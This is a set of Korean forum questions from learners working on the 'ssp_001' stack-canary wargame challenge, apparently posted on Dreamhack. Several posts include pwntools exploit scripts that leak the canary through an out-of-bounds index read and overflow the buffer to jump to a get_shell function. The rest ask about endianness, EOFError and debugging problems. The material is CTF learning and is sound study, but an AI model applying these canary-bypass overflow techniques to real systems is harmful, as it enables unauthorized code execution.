ssp_001

tmp.jpg 어찌저찌 풀기는 했는데, 카나리가 4byte니까 당연히 rbp-4에 있을 줄 알았는데 rbp-8에 있고 rbp-4에는 뜬금없이 GOT가 있어서 동적디버깅 전까지는 왜 안풀리나 했네요. 근데 저 주소 접근하려고 해도 열리지가 않아서, 뭔가요?🤔 아니 근데 애초에 저게 왜 저기있어요?

+------------------+ <- | name (64) | +------------------+ | box (64) | +------------------+ | canary(4) | +------------------+ | sfp(8) | +------------------+ | ret address | +------------------+ 이렇게 되있으면 카나리를 출력할려면 화살표부터 129, 130, 131, 132 를 출력할때부터 카나리가 나온다고 생각햇는데 128, 129, 130, 131 부터던데 이유가 뭘까요

일단 canary 값이 제대로 출력되는지 확인해보려고 했는데, 아래와 같이 실행 결과가 나옵니다 python ssp_001.py [+] Starting local process './ssp_001': pid 35290 [F]ill the box [P]rint the box [E]xit Name Size : Name : stack smashing detected *: terminated [*] Stopped process './ssp_001' (pid 35290) 강의 보면 canary+1까지 값을 채워넣으면 뒤에 값이 같이 출력되서 65개를 넣은건데 제가 잘못 이해했나요? 파이썬 코드는 아래와 같습니다 from pwn import * p = process("./ssp_001") payload = “A”*65 print(p.recvuntil("> ")) p.sendline(“E”) print(p.recvuntil("Name Size : ")) p.sendline(“1024”) print(p.recvuntil("Name : ")) p.sendline(payload) print(p.recv(1024)) `

File Name: test.py from pwn import * from struct import pack context.log_level = 'debug' HOST = 'host3.dreamhack.games' PORT = 20661 #p = remote(HOST, PORT) p = process("./ssp_001") get_shell = 0x80486b9 canary find cnry = b'' for i in range(4): p.sendafter(b"> ", b"P") p.recvuntil(b"Element index : ") p.sendline(str(128 + i)) p.recvuntil(b"is : ") cnry += p.recvn(2) cnry = int(cnry, 16) print(cnry) cnry = pack("<i", cnry) Payload Write payload = b'A'*64 payload += cnry payload += b"B"*4 payload += b"C"*4 payload += p32(get_shell) Exploit p.sendafter(b"> ", b"E") p.sendafter(b": ", b"100") p.recvuntil(b": ") p.send(payload) p.interactive test.py 실행 후 전체 사진 질문 : "Name size: " 수신 받고 100 바이트 문자열로 보내면 다음 응답을 못 받아오고 멈추네요. 다음 받아야 할 문자가 "Name : " 이니깐, recvuntil(": ") recvuntil("Name : ") sendafter("Name : ", payload) 등.. 다른 걸로 바꿔서 넣어봐도 그대로에요. 초보라 뭘 놓치고 있는 건지 모르겠네요 뭐가 문제인지 아시는 분은 알려주세요 ㅠㅠ

일단 파이썬으로 값이 잘 넘어가고 넘어오는지 보려고 페이로드 안짜고 툴만 돌려보고 있는데 P를 보내고 recv를 하면 Element index : 라고 나와야하는데 자꾸 가져올게 없대서요.. recv()말고 recvline이나 recvuntil(": ")를 해도 모두 EOFERROR가 떠요 뭐가 문제인가요?? >> p.recvuntil("> ") b'[F]ill the box\n[P]rint the box\n[E]xit\n> ' >> >> p.sendline(b"P") >> p.recv() Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/uhihi/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py", line 105, in recv return self._recv(numb, timeout) or b'' File "/home/uhihi/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py", line 183, in _recv if not self.buffer and not self._fillbuffer(timeout): File "/home/uhihi/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py", line 154, in _fillbuffer data = self.recv_raw(self.buffer.get_fill_size()) File "/home/uhihi/.local/lib/python3.9/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw raise EOFError EOFError

익스플로잇 코드를 암만 들여다 봐도 왜 안되는 지 모르겠어서 질문합니다..... 어디가 잘못되었는지 궁금합니다. <Exploit Code> 1 #!/usr/bin/python3 2 from pwn import * 3 4 p = remote("host3.dreamhack.games", 15608) 5 6 shell_addr = 0x80486b9 7 canary = b"" 8 9 for i in range(4) : 10 p.recvuntil("> ") 11 p.send("P") 12 p.recvuntil("index : ") 13 p.sendline(str(0x80 + i)) 14 p.recvuntil("is : ") 15 canary += p.recvn(2) 16 17 canary = int(canary, 16) 18 19 payload = b"A"*0x40 20 payload += p32(canary) 21 payload += b"B"*0x4 22 payload += b"C"*0x4 23 payload += p32(shell_addr) 24 25 p.recvuntil("> ") 26 p.send("E") 27 p.recvuntil("Size : ") 28 p.sendline(str(len(payload))) 29 p.recvuntil("Name : ") 30 p.send(payload) 31 p.interactive() <실행 후 화면>

워게임중 pwndbg를통해 디버깅을 하려고 하는데 다음과 같이 에러가나네요 64비트 운영체제에서 32비트바이너리 파일을 하려다 보니 생기는 문제같은데 해결방법을 아시는분 계실까요..?? pwndbg> b *main Breakpoint 1 at 0x804872b pwndbg> r Starting program: /home/seonghun/stackcanary/ssp_001 /bin/bash: /home/seonghun/stackcanary/ssp_001: cannot execute binary file: Exec format error /bin/bash: /home/seonghun/stackcanary/ssp_001: Success During startup program exited with code 126.

canary += p.recv(2) TypeError: can only concatenate str (not "bytes") to str 자꾸 이런 오류가 뜹니다.. 왜 그러는 걸까요?? 전체 exploit 코드는 다음과 같습니다 from pwn import * p = remote('host3.dreamhack.games', 16228) e = ELF('./ssp_001') canary = '' get_shell = e.symbols['get_shell'] #canary 구하기 for i in range(131, 127, -1): #box + 128 + 4, little endian p.sendafter('>', 'P') p.sendlineafter('Element index :', bytes(str(i), 'utf-8')) p.recvuntil(':') canary += p.recv(2) #canary += chr(int(p.recvline().strip(),16)) canary = int(canary, 16) #16진수 문자열을 10진수 정수로 변경 log.info('[+]canary: 0x%x' %canary) payload = b'A'* 0x40 #name[64] payload += p32(canary) #canary payload += b'B'*8 #dummy+ebp payload += p32(get_shell) #ret overload p.sendafter('>', 'E') p.sendlineafter('Name Size :', '200') p.sendafter('Name :', payload) p.interactive()

from pwn import * p = process('./ssp_001') index = ['131','130','129','128'] cnry = b"0x" for i in list(index): p.sendlineafter('> ','P') p.sendlineafter('Element index : ',i) string = p.recvuntil('is : ') cnry += p.recvn(2) print("canary : "+cnry) cnryval = hex(int(cnry,16)) print(cnryval) p32(cnryval) # 이게 안됨.. p.sendlineafter('> ','E') p.sendlineafter('Name Size : ','300') offset = 64 get_shell = p32(0x80486b9) #payload = b'A'*offset + p32(cnryval) + b'bbbb' + get_shell #p.sendlineafter('Name : ',payload) #p.interactive() for문을 통해 cnry에 카나리 값을 문자열로 저장하고 cnryval에 16진수 값으로 저장했습니다. p32(cnryval)에서 문제가 있어 위 사진처럼 뜹니다.. 문제를 못 찾아서 이렇게 올려봅니다.. pwntools 초보라 가독성이 많이 떨어질 수 있습니다.

from pwn import * p = remote('host3.dreamhack.games', 21344) e = ELF('./ssp') pay = b'a'*129 p.sendafter(b'> ',b'F') p.sendafter(b'box input : ', pay) p.sendafter(b'> ',b'P') p.sendlineafter('Element index : ', '131') p.recvuntil(b'Element of index 131 is : ') canary = p.recv(2) p.sendafter(b'> ',b'P') p.sendlineafter(b'Element index : ',b'130') p.recvuntil(b'Element of index 130 is : ') canary += p.recv(2) p.sendafter(b'> ',b'P') p.sendlineafter(b'Element index : ',b'129') p.recvuntil(b'Element of index 129 is : ') canary += p.recv(2) p.sendafter(b'> ',b'P') p.sendlineafter(b'Element index : ',b'128') p.recvuntil(b'Element of index 128 is : ') canary += p.recv(2) success(canary) canary = int(canary,16) success('p sent') address = 0x080486b9 payload = b'a'64 + p32(canary) + b'a'0x8 + p32(address) p.sendafter(b'> ',b'E') p.sendlineafter(b'Name Size : ',b'1000') p.sendafter(b'Name : ', payload) p.interactive() 위는 제가 작성한 코드입니다. 카나리와 관련해서 질문이 있습니다. 처음에 카나리값을 128~131까지 받아와서 저장한 뒤 payload를 보낼 때 p32(canary)를 해주면 될 것이라고 생각해서 해봤는데 안되었습니다. 하지만 카나리를 역순으로 받으니 문제가 해결되더라고요. 질문사항은 아래와 같습니다. 위 코드대로 했을 때는 처음에 recv를 통해서 만들어진 canary 값은 원래 값의 역순일 것입니다.(예를 들어 원래 카나리 값이 00112233 이렇다면 저기의 canary는 33221100이겠죠) 그런데 이렇게 만들어진 카나리에 p32()를 씌워버리면 다시 00112233이 되니까 페이로드를 보낼 때 리틀엔디언방식(즉 역순)으로 보내지는 것이 아니라서 처음에 받을 때 순방향으로 받고 p32()로 리틀엔디언 패킹을 해줘야 하는게 아닌가요? 이렇게 생각한 이유는 address의 경우 순방향 값인 0x080486b9을 address에 넣은 뒤 p32()로 페이로드에 작성했으므로 canary도 처음에 순방향으로 받고 이후에 p32()로 리틀엔디언 패킹을 해줘야한다고 생각해서입니다.